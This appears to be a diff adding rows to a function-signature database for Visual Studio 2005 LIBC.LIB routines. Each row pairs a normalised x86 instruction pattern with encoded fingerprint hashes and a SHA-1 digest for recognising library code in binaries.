+__mbslen,"MOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nTEST R8,R8\nJCC CONST",KeroSJ2giDNhmoGJx2MDRgAAAAAAAAAAYZqBiQGhdbOdoIgznaCIM4/izv0AAAAAAaF1swAAAAAAAAAArDAi9gGhdbMp6uhIj+LO/QGhdbMp6uhIJAPDnawwIvbHYwNG,[],6bf678b56523e5dafa2de42fc0625ed4ecb67dcd,VS2005,LIBC.LIB
+__ecvt,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nFLD QWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32",AaF1swAAAAAAAAAAEG9j8gGhdbMAAAAAvOgj7QGhdbMQb2Py,[],98275f4a8ec75afe5063917ae39d935811bf715b,VS2005,LIBC.LIB
+__fcvt,"FLD QWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nADD R32,DWORD PTR SS:[ESP+CONST]",cAlY3QAAAAAAAAAA,3U69twAAAAAAAAAA,ad560061f15aa021ee54c0fdba6a5cfe3bee12de,VS2005,LIBC.LIB
+__fptostr,"PUSH R32\nCALL CONST\nINC R32\nPUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nADD ESP,CONST",YZqBiVY8avVr4HIuTdVUno/izv1BRdAba+ByLmGagYkAAAAAqpPdsgAAAAAAAAAAVjxq9RTEiGoAAAAAFMSIaoAaG4igNzqhWFl2n03VVJ4AAAAAvEgM8I/izv0AAAAAQUXQG8vPpooAAAAAoDc6oaqT3bIAAAAAnYJjGU3VVJ4AAAAAy8+mihTEiGoUxIhqgBobiKqT3bIAAAAAWsxfZsvPpoq8SAzwj+LO/VhZdp+dgmMZFMSIahTEiGphmoGJ,[],22ec7bd032a3c45d3cfcdca2c73ab4008056f7e4,VS2005,LIBC.LIB
+__fseeki64,"PUSH R32\nCALL CONST\nADD DWORD PTR SS:[EBP+CONST],R32\nPOP R32\nADC DWORD PTR SS:[EBP+CONST],R32\nXOR R32,R32\nPUSH R32\nCALL CONST",g/KBGSSjmVwAAAAAV+6HaYPSWsC+W80Wu7ZcLIPygRlX7odpKeth2SSjmVwNzMABH+fBZCSjmVwNzMABzJD8/CnrYdkAAAAAJKOZXDlafGAAAAAAvlvNFtjNBKbMkPz8OVp8YAAAAAAAAAAA2M0EpinrYdnYzQSmLlW5/lfuh2m7tlws56xD+oPygRkuVbn+2M0EpinrYdlb0BXgu7ZcLFfuh2m7tlwsW9AV4CnrYdkf58Fkg9JawNjNBKbMkPz8DczAATlafGAAAAAA,[],ecb10ea9856ce45641428dbe0925aa4aa61386bb,VS2005,LIBC.LIB
+__stat,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,R32",2+hAvgAAAAAAAAAAsbXzyGHqQPOP4s79nDewpNvoQL4tjqF8LY6hfNvoQL4zjAqGj+LO/fuOkaWW7PjPBWuvt4k5mYeIXCPrxNmJwAAAAAAAAAAAQvjW1gAAAAAAAAAAyPvC5kL41tYAAAAAiFwj6+iZVTqJOZmHLY6hfNvoQL7VdbCAM4wKhpw3sKTyoP4qluz4z/uOkaXI+8LmiTmZh+iZVToqmrFL+46RpQ52sqsAAAAAdcK7+0L41tYAAAAA1XWwgJw3sKTyoP4qYepA85w3sKQkP6zuYcmajEL41tYAAAAADnayq5w3sKQkP6zu0LhLTZw3sKTyoP4qKpqxS2HJmowAAAAA8qD+Kpw3sKSgNzqh0MTIbeiZVToFa6+3oDc6oXXCu/sAAAAAJD+s7uiZVTrQxMhtnDewpNvoQL7YxfZE4l+1kkL41tYAAAAAIcjSeMj7wuaxtfPI8qD+KtC4S02cN7CknDewpNvoQL4tjqF86JlVOsTZicAAAAAA2MX2RNvoQL7iX7WS,[],f7744bd1f89334510469243f12acaf1d2c2d9b08,VS2005,LIBC.LIB
+___dtoxmode,"NOT R8\nAND R32,CONST\nPUSH CONST\nOR R8,CONST\nPUSH R32\nSHL R32,CONST\nOR R32,R32\nCALL CONST",KF2byeSalPT3Zl4vW/sQlwAAAAAAAAAAJw91EiqzQt7YzQSmW9AV4NjNBKYnD3US0XT71iSjmVzRdPvW2M0EpiqzQt5PTz7U0XT71lv7EJcko5lcT08+1LGZ5BEqs0LeJKOZXFv7EJcAAAAA92ZeL+SalPQAAAAAKrNC3rGZ5BEAAAAA5JqU9CcPdRJb0BXg0XT71iSjmVzRdPvW0XT71iSjmVzRdPvWsZnkEVv7EJfRdPvW,[],870dd180b335836b9154b88c9acee8c3a4100a23,VS2005,LIBC.LIB
+_div,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nIDIV DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ",OHmGgE+LzApy6DpFT4vMCgAAAAAAAAAAcug6RU+LzAr3GNLs9xjS7E+LzAoAAAAA,[],e9b28d407d62f1c8a31419eb3cb1de578fbfe1dc,VS2005,LIBC.LIB
+__forcdecpt,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nCMP R32,CONST\nPOP R32\nJCC CONST",UV3Kfj3XBaRj7p98hO/x56tlAqUAAAAAAOHWawAAAAAAAAAAcug6RVFdyn6E7/HnY+6ffHLoOkUAAAAAk4XtloTv8edRXcp+q2UCpatlAqUA4dZrPdcFpFFdyn6E7/Hn,[],eff453dac37193f6c4821d31d26c89191c73dde7,VS2005,LIBC.LIB
+__cftoe,"XOR R32,R32\nPUSH CONST\nCMP BYTE PTR DS:[0],R8\nSETE R8\nADD R32,R32\nADD R32,R32\nPUSH R32\nCALL CONST",5AkDQs7oVc8AAAAAbVC94nLoOkVCtzpwDkJEbBjsTubLZ/gvcug6RZUOtpxoxgRiEPvFzRjsTuYAAAAAGOxO5gAAAAAAAAAALIblBG1QveKYYj+uy2f4L87oVc9DACDUzuhVzxD7xc3kCQNCEG9j8g5CRGwAAAAAQwAg1M7oVc8AAAAA5AkDQhD7xc0AAAAAaMYEYg5CRGwQb2PyzuhVz87oVc/kCQNCg65DXnLoOkVCtzpwmGI/roOuQ14AAAAAQrc6cJUOtpxoxgRilQ62nA5CRGwQb2Py,[],a2b54d2f99e7bc5bcb698e47ef32aadf8d680a1c,VS2005,LIBC.LIB
+__positive,"MOV R32,DWORD PTR SS:[ESP+CONST]\nFLD QWORD PTR DS:[R32]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nSAHF\nJCC CONST",Us42lQAAAAAAAAAAzFgIy1LONpVSDvi0Ug74tAAAAAAAAAAA,[],ad56a4d55d64dc88f8be9af8da3bea09b1eadc3e,VS2005,LIBC.LIB
+__cftog,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",EPvFzUoRY/MAAAAAqpPdsgAAAAAAAAAAShFj86qT3bIAAAAAPSxPY7zcFHly6DpFcug6RbzcFHnYzQSmvNwUeaqT3bIAAAAA2M0EpkoRY/NcpTmJXKU5iVylOYkQ+8XN,[],27929508c87a313b8f9dd580d8688d4b572ed0d3,VS2005,LIBC.LIB
+__cftof,"PUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nMOV BYTE PTR DS:[R32],CONST\nPOP R32\nINC R32\nJMP SHORT CONST",VUVm/+RSvJ8e5ZjpLqa4WnZM+psDju/XFiLQ5AAAAAAAAAAA7Fj7kgAAAAAAAAAAHuWY6XLoOkUAAAAALlW5/i5Vuf5VRWb/+3N6pORSvJ8NzMAB5FK8n6dleua5qpZoA47v1y5Vuf60YsQPcug6Radleua5qpZotGLEDy5Vuf4AAAAAuaqWaKdleub7c3qkp2V65gAAAAAAAAAADczAARYi0OQAAAAALlW5/uRSvJ8e5Zjpdkz6my5Vuf5VRWb/5FK8n+xY+5IWItDk,[],75271e78bd327d16a857b1ca8a096112990f58b2,VS2005,LIBC.LIB
+__fassign,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32",waEfBwAAAAAAAAAAUr1kHBCDCgXBoR8HEIMKBQAAAAAAAAAA,[],f5491fff6f17e081e2543bd8bf47f608c4715d90,VS2005,LIBC.LIB
+__cfltcvt,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",IIln+8K8QFYAAAAAcMiU5CCJZ/uchlE4G9F/HsK8QFYAAAAAnIZROCCJZ/uchlE4wrxAVgAAAAAAAAAAnIZROBvRfx6YWz70mFs+9AAAAAAAAAAA,[],45f23a3297a26b7b05a1b5664ba2a0aa888f9ca5,VS2005,LIBC.LIB
+__cropzeros,"MOV R8,BYTE PTR DS:[R32]\nINC R32\nINC R32\nTEST R8,R8\nMOV BYTE PTR DS:[R32],R8\nJCC CONST",AaF1swAAAAAAAAAAW9AV4Cbu4WXo/oHQ2M0EplylOYnokgST6P6B0I/izv0AAAAA6JIEk9jNBKZcpTmJJu7hZWGagYkAAAAAYZqBiWGagYknRqqeXKU5iQGhdbOP4s79J0aqnoI/kh6HR1I/5vm/VlylOYnYzQSmh0dSP4I/kh4AAAAAj+LO/Sbu4WVb0BXgW9AV4Cbu4WVb0BXggj+SHoI/kh4BoXWz,[],8d020f5e54cc0c29bd345aef4525b3e513d0903f,VS2005,LIBC.LIB
+__mbsdup,"PUSH R32\nCALL CONST\nINC R32\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32",S+j+OQAAAAAAAAAAT4vMCgAAAAAAAAAAkTDPGE+LzAru88/w7vPP8E+LzApL6P45,[],db897ea8cdd3096a2bc714163d2ba3b76513b379,VS2005,LIBC.LIB
+_strncpy,"MOV R32,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,CONST\nTEST R32,CONST",CWY21IiIMg7YzQSmu7ZcLAlmNtReo4MnXqODJ3as6uwAAAAAObuV3k1jEN3YzQSm2M0EpgAiwtXYzQSm2M0EpljaKDpY2ig62M0EpgqI+jZY2ig6WNooOjm7ld4tDNr2WNooOgqI+jZY2ig6LQza9glmNtS7tlwsWNooOoiIMg5F33qQu7ZcLE1jEN12rOrsRd96kIZpg1IAAAAAdqzq7Jfae5SX2nuUCoj6NoZpg1IAAAAAl9p7lHas6uxNYxDdCoj6NoZpg1IAAAAATWMQ3QAAAAAAAAAAPaQlvTm7ld67tlwsWNooOi0M2vbwV7jXACLC1YZpg1IAAAAAhmmDUru2XCwm7uFl8Fe4101jEN1Y2ig6Ju7hZYiIMg4AAAAAiIgyDoiIMg67tlwsWNooOvBXuNctDNr2u7ZcLIGGgcJNYxDdLQza9ibu4WWBhoHCTWMQ3QAAAAAAAAAAgYaBwpfae5QAAAAAl9p7lIGGgcJZ3Yd2AcDPEENQbiQ9pCW9Wd2HdkNQbiQAAAAAQ1BuJAAAAAAAAAAAiIgyDru2XCwJZjbU,[],ab6426e64c79771538fe9c2f6ceb9f843d06e06b,VS2005,LIBC.LIB
+_toupper,"AND BYTE PTR SS:[EBP+CONST],0\nMOV BYTE PTR SS:[EBP+CONST],R8\nPUSH CONST\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH CONST\nPUSH CONST\nPUSH CONST",EkCIr06gi7FO/QsUu7ZcLEbnnw9YK49WGLGkv9TjmvsAAAAAwoDz/HLoOkUAAAAAWCuPVk6gi7EAAAAATv0LFE6gi7GvJ1dcDczAAU6gi7EAAAAARuefD06gi7EAAAAA+awP0NnGROANzMAB2cZE4NtoKdsYsaS/JAPDnfmsD9DCgPP8B8nQ1gRnq4ESQIiv22gp2w3MwAG7tlwsrydXXE6gi7EAAAAAcug6RdnGROANzMABTqCLsQAAAAAAAAAA1OOa+w3MwAG7tlwsBGergdnGROAkA8Od,[],c6f9b312eccb28442fc85714bd592b2715d3337d,VS2005,LIBC.LIB
+__toupper,"MOV R32,DWORD PTR SS:[ESP+CONST]\nADD R32,-20\nRETN",/0BimwAAAAAAAAAA,[],d17940e4f4b1c2bfe25ef8cf9f0f294b4b3f12e3,VS2005,LIBC.LIB
+_qsort,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nSUB R32,R32\nXOR R32,R32\nDIV R32\nINC R32\nCMP R32,CONST\nJCC CONST",cug6RX7BLkJ2nWVTlClsjY32nnQAAAAAdp1lU37BLkIAAAAALlW5/o8IZ4vGq3L5xqty+S5Vuf6PCGeLfsEuQuKxmTE6xLKOjfaedBVJZAPIPobYjwhniyDNBRKcppE9OsSyjo32nnQAAAAAnKaRPdwcfo4AAAAAxqty+dwcfo4uVbn+QvjW1gAAAAAAAAAAyD6G2OKxmTEAAAAAIM0FEnLoOkVrI/p24rGZMUL41tZ/pjgkayP6doejbX25qQU2f6Y4JI32nnQAAAAAuakFNoejbX0AAAAAFUlkA9wcfo4AAAAANDPylkL41tZpzQYAac0GAEL41taUKWyNh6NtfeKxmTFmeTE13Bx+ji5Vuf7Gq3L5ZnkxNY32nnQAAAAA,[],30d9f74461daa163161805f3fd400613136ca8b0,VS2005,LIBC.LIB
+__FillZeroMan,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nSTOS DWORD PTR ES:[R32]\nSTOS DWORD PTR ES:[R32]\nSTOS DWORD PTR ES:[R32]\nPOP R32\nRETN",RvmYQAAAAAAAAAAA,[],1e27629765f8a9a542fe9d49d0a4f44bc6a3a8c1,VS2005,LIBC.LIB
+__ld12tod,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",LK//GwAAAAAAAAAA,Zrn/FMsDe6MAAAAAcug6RXntRpWG12+SQvjW1gAAAAAAAAAAee1GlT2tUdbnPdmDhtdvkma5/xQAAAAA9eT4/bu2XCwkLoDq83WF8epLTJmGpWwt6ktMmXLoOkUg6G88JC6A6kL41tYAAAAAofI0RPXk+P1DxH50NFbRy8sDe6MAAAAAZnkxNWa5/xQAAAAAPa1R1ru2XCwkLoDq5z3ZgzRW0csAAAAAhqVsLXLoOkUg6G88IOhvPGZ5MTUAAAAAQ8R+dMsDe6MAAAAAywN7o7u2XCwkLoDqu7ZcLEL41tat2Th1ILUsv/N1hfGh8jRErdk4dUL41tYAAAAA,bc9d0d122b610896fce3da720ecf999aabda8cbd,VS2005,LIBC.LIB
+__atodbl,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nXOR R32,R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32",yChmCAAAAAAAAAAA,QUXQG+hVq9oAAAAAnIZROBW0sB1yjluXco5blxW0sB0AAAAAZgKDmwSKi1miEuI6jLQvw5yGUTgAAAAAFaQbjeSalPQAAAAA6FWr2uhVq9qWc/BfFbSwHQAAAAAAAAAAohLiOtyS/IgnD3USnIZROJyGUTgz+rYvJw91EpwIsUgQb2PyM/q2LxW0sB0AAAAAEG9j8pwIsUgAAAAAnAixSGnNBgAAAAAA3JL8iLpeKO9hmoGJac0GALpeKO9hmoGJ6FWr2mVmWrH0Ke4IlnPwX4y0L8MAAAAASDQjuwAAAAAAAAAA9CnuCIy0L8MAAAAAYZqBicb+uL78irka/Iq5GmGagYkAAAAAZWZasZyGUTgAAAAA5JqU9Oj+gdBb0BXgxv64vg5+bn4m7uFlW9AV4Oj+gdBb0BXgW9AV4Oj+gdBb0BXgW9AV4FhZdp/o/oHQ6P6B0OSalPQAAAAAWFl2n8qVNjsAAAAAul4o75yGUTgAAAAAypU2O079CxRINCO7Tv0LFGYCg5s1FnITJu7hZQ5+bn4AAAAADn5ufrshlPZBRdAbBIqLWRW0sB0AAAAANRZyE8qVNjsAAAAAQUXQG7shlPYAAAAAuyGU9uhVq9pBRdAb,8b4caa59ee8dbf4010d211f8f9946fa51b12627b,VS2005,LIBC.LIB
+__ld12tof,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",LK//GwAAAAAAAAAA,QvjW1gAAAAAAAAAANFbRy8sDe6MAAAAAee1GlcK6DJjnPdmD5z3ZgzRW0csAAAAAJu7hZcsDe6MAAAAA83WF8epLTJmGpWwt6ktMmXLoOkUg6G88JC6A6kL41tYAAAAAywN7o7u2XCwkLoDqZnkxNWa5/xQAAAAAhyEP7ma5/xQAAAAAwroMmCbu4WUAAAAAIOhvPGZ5MTUAAAAAzf1gI2Z5MTUAAAAAhqVsLXLoOkUg6G88ofI0RCbu4WWHIQ/uu7ZcLEL41tat2Th1ILUsv/N1hfGh8jRErdk4dUL41tYAAAAAZrn/FMsDe6MAAAAAcug6RXntRpXN/WAj,bc9d0d122b610896fce3da720ecf999aabda8cbd,VS2005,LIBC.LIB
+__ld12told,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nAND DWORD PTR SS:[EBP+CONST],0\nMOV R16,WORD PTR DS:[R32+CONST]",Mq+2fYjpQQ4uyQ+fJNTqCwAAAAAAAAAALskPn9RUwrUAAAAAiOlBDiTU6gtLDhNr1FTCtSTU6gtLDhNrSw4TawAAAAAAAAAA,[],fcf74d9b83edf50027ac6aecb644b6224460f80d,VS2005,LIBC.LIB
+__atoldbl,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nXOR R32,R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH CONST",0oEazAAAAAAAAAAA,QUXQG7shlPYAAAAAuyGU9uhVq9pBRdAbQUXQG+hVq9oAAAAAnIZROBW0sB1yjluXco5blxW0sB0AAAAAZgKDmwSKi1miEuI6jLQvw5yGUTgAAAAAFaQbjeSalPQAAAAAFbSwHQAAAAAAAAAAohLiOkFF0BsnD3USnIZROJyGUTgz+rYvJw91EpwIsUgQb2PyM/q2LxW0sB0AAAAAEG9j8pwIsUgAAAAAnAixSGnNBgAAAAAAQUXQG2nNBgAAAAAAac0GALpeKO9hmoGJ6FWr2mVmWrH0Ke4I6FWr2uhVq9qWc/Bf9CnuCIy0L8MAAAAAYZqBicb+uL78irka/Iq5GmGagYkAAAAAZWZasZyGUTgAAAAA5JqU9Oj+gdBb0BXgxv64vg5+bn4m7uFlW9AV4Oj+gdBb0BXgW9AV4Oj+gdBb0BXgW9AV4FhZdp/o/oHQ6P6B0OSalPQAAAAAlnPwX4y0L8MAAAAAWFl2n8qVNjsAAAAASDQjuwAAAAAAAAAAul4o75yGUTgAAAAAypU2O079CxRINCO7Tv0LFGYCg5s1FnITJu7hZQ5+bn4AAAAADn5ufrshlPZBRdAbBIqLWRW0sB0AAAAANRZyE8qVNjsAAAAA,374a663d0682ede1931bca63f085b40edb60aea6,VS2005,LIBC.LIB
+__ZeroTail,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH CONST\nCDQ\nPOP R32\nIDIV R32\nPUSH CONST\nMOV R32,R32",5APUd98TwOUAAAAA3xPA5U+LzAoxYL1HEUuFJU+LzArO6FXPtG2SEQAAAAAAAAAAT4vMCgAAAAAAAAAAzuhVz7RtkhHkA9R3MWC9R98TwOW0bZIR,[],3b7c54c8b3d6d0dbd92bb321b53950bf0e7a7926,VS2005,LIBC.LIB
+__ld12cvt,"PUSH DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND BYTE PTR SS:[EBP+CONST],CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nADD R32,R32\nCALL CONST\nPOP R32",ILUsv/N1hfGh8jRErdk4dUL41tYAAAAAywN7o7u2XCwkLoDqB/2JQTRW0csAAAAAcug6RXntRpXN/WAjQvjW1gAAAAAAAAAAee1GlcK6DJjnPdmDzf1gI2Z5MTUAAAAANFbRy8sDe6MAAAAAJu7hZcsDe6MAAAAA83WF8epLTJmHR1I/6ktMmXLoOkUg6G885z3ZgzRW0csAAAAAJC6A6kL41tYAAAAAofI0RCbu4WWHIQ/uh0dSP+pLTJkAAAAAwroMmCbu4WUAAAAAZnkxNQf9iUEAAAAAIOhvPGZ5MTUAAAAAhyEP7gf9iUEAAAAAu7ZcLEL41tat2Th1,[],24a92dc44f46520e27de0d8b3665990abc193c7c,VS2005,LIBC.LIB
+__atoflt,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nXOR R32,R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32",yChmCAAAAAAAAAAA,W9AV4FhZdp/o/oHQ6P6B0OSalPQAAAAAWFl2n8qVNjsAAAAAul4o75yGUTgAAAAAypU2O079CxRINCO7Tv0LFGYCg5s1FnITVG+02LshlPYOfm5+Dn5ufrshlPYOfm5+BIqLWRW0sB0AAAAANRZyE8qVNjsAAAAAlnPwX4y0L8MAAAAADn5ufuhVq9q06ChhuyGU9uhVq9q06ChhSDQjuwAAAAAAAAAAtOgoYehVq9qWc/BfnIZROBW0sB1yjluXco5blxW0sB0AAAAAZgKDmwSKi1miEuI6jLQvw5yGUTgAAAAAFaQbjeSalPQAAAAAFbSwHQAAAAAAAAAAohLiOtyS/IgnD3USnIZROJyGUTgz+rYvJw91EpwIsUhGF+JyM/q2LxW0sB0AAAAARhficmnNBgAAAAAAnAixSGnNBgAAAAAA3JL8iLpeKO9hmoGJac0GALpeKO9hmoGJ6FWr2mVmWrH0Ke4I9CnuCIy0L8MAAAAAYZqBicb+uL78irka/Iq5GmGagYkAAAAAZWZasZyGUTgAAAAA6FWr2uhVq9qWc/Bf5JqU9Oj+gdBb0BXgxv64vg5+bn5Ub7TYW9AV4Oj+gdBb0BXgW9AV4Oj+gdBb0BXg,8b4caa59ee8dbf4010d211f8f9946fa51b12627b,VS2005,LIBC.LIB
+__ShrMan,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,R32\nAND R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,R32\nSHR R32,R8\nOR R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32",QvjW1gAAAAAAAAAAQRg9z3LoOkUAAAAAVS5NqM7oVc8AAAAAhq+28k8OL24AAAAAzuhVz3LoOkVC+NbWcug6RVUuTajqEOMz6hDjM87oVc8AAAAATw4vbk8OL25BGD3P,[],e8cad8ff5589db41ba86b9ca3ecf5ea1d56e33e5,VS2005,LIBC.LIB
+__CopyMan,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH CONST\nSUB R32,R32\nPOP R32\nMOV R32,DWORD PTR DS:[R32]\nMOV DWORD PTR DS:[R32+R32],R32",ZoNxbiq6UxMA4dZrAOHWawAAAAAAAAAAKrpTEyq6UxMA4dZr,[],31f4f5fd2136a5a268768fdf0a8cc8e4fae6964f,VS2005,LIBC.LIB
+__IsZeroMan,"INC R32\nADD R32,CONST\nCMP CONST2,CONST\nJCC CONST",MWC9R98TwOVSDvi0Ug74tAAAAAAAAAAA3xPA5VLONpUxYL1HUs42lQAAAAAAAAAAm+/JPt8TwOUAAAAA,[],91ab2c6030cc95410d10b573c1c5d231fbb98f0a,VS2005,LIBC.LIB
+__IncMan,"PUSH R32\nPUSH CONST\nPUSH DWORD PTR DS:[R32]\nCALL CONST\nADD ESP,CONST\nDEC R32\nSUB R32,CONST\nTEST R32,R32",FXH5r3LoOkU5Wnxg5APUd3LoOkUAAAAAY0WBbzlafGDkA9R3cug6RTlafGAVcfmvOVp8YAAAAAAAAAAA,[],c03eb7f138a38a4aaaa8892195db1b48da42f2ea,VS2005,LIBC.LIB
+__RoundMan,"OR R32,CONST\nMOV R32,R32\nSHL R32,R8\nPUSH CONST\nPOP R32\nAND DWORD PTR DS:[R32],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nINC R32",vyLg3nOiGWFjiyiNY4sojQAAAAAAAAAAc6IZYQAAAAAAAAAAqnzQiqNDh3KhRJo14I3ymXOiGWFjiyiNoUSaNeCN8pm/IuDeo0OHcnOiGWFjiyiN,[],df32318221ddd667388a4e19403f1555bde695ae,VS2005,LIBC.LIB
+_DllMain@12,PUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nPUSH CONST\nPOP R32\nRETN CONST,+feGKQAAAAAAAAAAJAPDnfLwt0H594YpzSwRpvLwt0EkA8Od8vC3QQAAAAAAAAAA,[],a38cdb3c0600e902cb363a16f344230d13613fbc,VS2005,LIBC.LIB
+__fcloseall,"MOV R32,DWORD PTR DS:[0]\nPUSH DWORD PTR DS:[R32+R32*4]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nPOP R32\nAND DWORD PTR DS:[R32+R32*4],0\nINC R32\nCMP R32,DWORD PTR DS:[0]",WC45YdV/HhxGk6MEBWuvt7u2XCzO6FXPY4CifEaTowTVfx4c07ADHEaTowTVfx4czuhVz9OwAxxjgKJ8u7ZcLNOwAxxjgKJ8RpOjBNOwAxwnD3US1X8eHAAAAAAAAAAAJw91Eru2XCwFa6+3,[],f7397ea27a6b4fb4152929fc86c4c0e7fa1c69e8,VS2005,LIBC.LIB
+__access,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",m5BQ/AAAAAAAAAAAMETjpNjNBKYD9syIUs42lQAAAAAAAAAAMPx8IlLONpWomYuaqJmLmpuQUPwAAAAA2M0EplLONpUw/HwiA/bMiAAAAAAAAAAA,[],2af3526497ce02f6d59f679a78fe1b8784417fad,VS2005,LIBC.LIB
+__filbuf,"PUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR DS:[R32+CONST],R32\nTEST R32,R32\nJCC CONST",W9AV4ESFW3mWc/BflnPwX0SFW3kAAAAAPWQhaFDsZiwAAAAARIVbeQAAAAAAAAAArdk4dVDsZiwAAAAAUOxmLIklrN27tlwsiSWs3cK8QFYAAAAAiw0UTESFW3nuj+9owrxAVgAAAAAAAAAAu7ZcLIklrN3uj+9o7o/vaIsNFEwo0VBEKNFQRCqzQt73825o9/NuaC++OUcAAAAAe/xTo8K8QFYthlOeKrNC3i++OUcAAAAAL745R4sNFEw/4G0ULYZTnsK8QFbYzQSmP+BtFIsNFEwAAAAA2M0EppzH/b6nJQ3IpyUNyMK8QFYAAAAA7o/vaESFW3lb0BXgnMf9vq3ZOHU9ZCFo,[],0f98cda57d7aaf8ffabc6fcfb88cc61202983c4a,VS2005,LIBC.LIB
+__winput,"INC DWORD PTR SS:[EBP+CONST]\nMOVZX R32,R16\nSUB R32,CONST\nCDQ\nADD R32,R32\nADC DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nMOV DWORD PTR SS:[EBP+CONST],R32",Tv0LFOoyhLjUzC5b8mWc7zHP1TbSRCIqHC+TjHLoOkUAAAAAac0GADHP1TbSRCIqa2O+5efdbAka72UODczAAVvQFeAAAAAA0kQiKufdbAnckvyIJw91Ep2giDMnD3USGu9lDufdbAkAAAAAJw91EpfCGBiEKSmv3JL8iB8P4yhp/dsKhCkpr5yGUTgAAAAAivaA82nNBgAkA8OdJw91EjMH9ycKBDvh2Qmbe9JEIioAAAAACgQ74TO5wybsa0Rtaf3bCufdbAkAAAAAl8IYGJyGUTgAAAAAcug6RScPdRKeO6rIa+ByLtJEIioAAAAANRZyE+fdbAkAAAAAu7ZcLCUskvu7tlwsW9AV4GnNBgAkA8OdnaCIM5yGUTgAAAAA6kS0ENJEIio/EpRp7GtEbTUAAHQAAAAAlkNsEipYl90AAAAAu7ZcLGvgci5r4HIu3xPA5ZWf/EJy6DpFa+ByLtJEIioAAAAAa+ByLtJEIioAAAAA6jKEuB9504DfE8Dl/74RCHLoOkUAAAAAPxKUaVvQFeCchlE4EG9j8mvgci4AAAAA3xPA5ScPdRL7tgc5nIZROFvQFeCchlE4cug6RZWf/EJYK49WJSyS+9JEIioAAAAAnIZROFvQFeCum0LY0kQiKufdbAnckvyI46KrfO68llsAAAAA0kQiKsZkNHlOco4CrptC2G/gN/MkA8OdFeBi4GnNBgD81CstlZ/8QmnNBgC5GciLu7ZcLOUw/je7tlws3JL8iOfdbAkfD+MoFeBi4Coy+7z81CstTnKOAucTVt8OLRQXXLNE1oyeZjVBjXwbHC+TjIejbX0AAAAAHw/jKABVgxr9yWqbcug6RWnNBgD81Cst/NQrLWnNBgDwKdUN/clqm+fdbAkAAAAAuRnIiyVWsETqMoS48CnVDVvQFeAAAAAAu7ZcLPmEJX5O/QsUqfgT7m/gN/OchlE45xNW300krmDuvJZbAFWDGufdbAkAAAAA5atDHOpEtBDSRCIqTv0LFHLoOkVO/QsUH3nTgGnNBgC5GciLH2GeTOoyhLhYK49W7ryWW9zYEyHqMoS4A/smXl4aQXQAAAAA